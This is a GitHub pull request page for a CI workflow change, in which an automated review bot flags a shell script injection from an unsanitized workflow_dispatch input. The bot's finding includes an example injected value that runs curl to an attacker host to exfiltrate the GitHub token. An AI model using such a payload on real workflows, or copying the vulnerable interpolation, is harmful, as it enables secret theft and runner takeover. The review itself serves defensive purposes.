ci(fix-security-vulnerability): Run fetch alert first before executing skill#19418
ci(fix-security-vulnerability): Run fetch alert first before executing skill#19418nicohrubec wants to merge 1 commit intodevelopfrom
Conversation
There was a problem hiding this comment.
Cursor Bugbot has reviewed your changes and found 1 potential issue.
Bugbot Autofix is OFF. To automatically fix reported issues with Cloud Agents, enable Autofix in the Cursor dashboard.
| - name: Extract alert number | ||
| id: alert | ||
| run: | | ||
| INPUT="${{ github.event.inputs.alert }}" |
There was a problem hiding this comment.
Script injection via unsanitized workflow dispatch input
High Severity
The github.event.inputs.alert value is directly interpolated into a shell run: block via INPUT="${{ github.event.inputs.alert }}". This is a classic GitHub Actions script injection — a user who can trigger workflow_dispatch could supply a crafted input (e.g., containing "; curl attacker.com/exfil?t=$(cat $GITHUB_TOKEN) #) to execute arbitrary commands within the runner context, which has contents: write, pull-requests: write, and access to secrets.ANTHROPIC_API_KEY. The safe pattern (used in other workflows like build.yml) is to pass the input through an env: block instead.
Triggered by project rule: PR Review Guidelines for Cursor Bot
Codecov Results 📊Generated by Codecov Action |
Codecov Results 📊✅ 1 passed | Total: 1 | Pass Rate: 100% | Execution Time: 1.97s All tests are passing successfully. Generated by Codecov Action |
size-limit report 📦
|
node-overhead report 🧳Note: This is a synthetic benchmark with a minimal express app and does not necessarily reflect the real-world performance impact in an application.
|


Closes #issue_link_here
Closes #19419 (added automatically)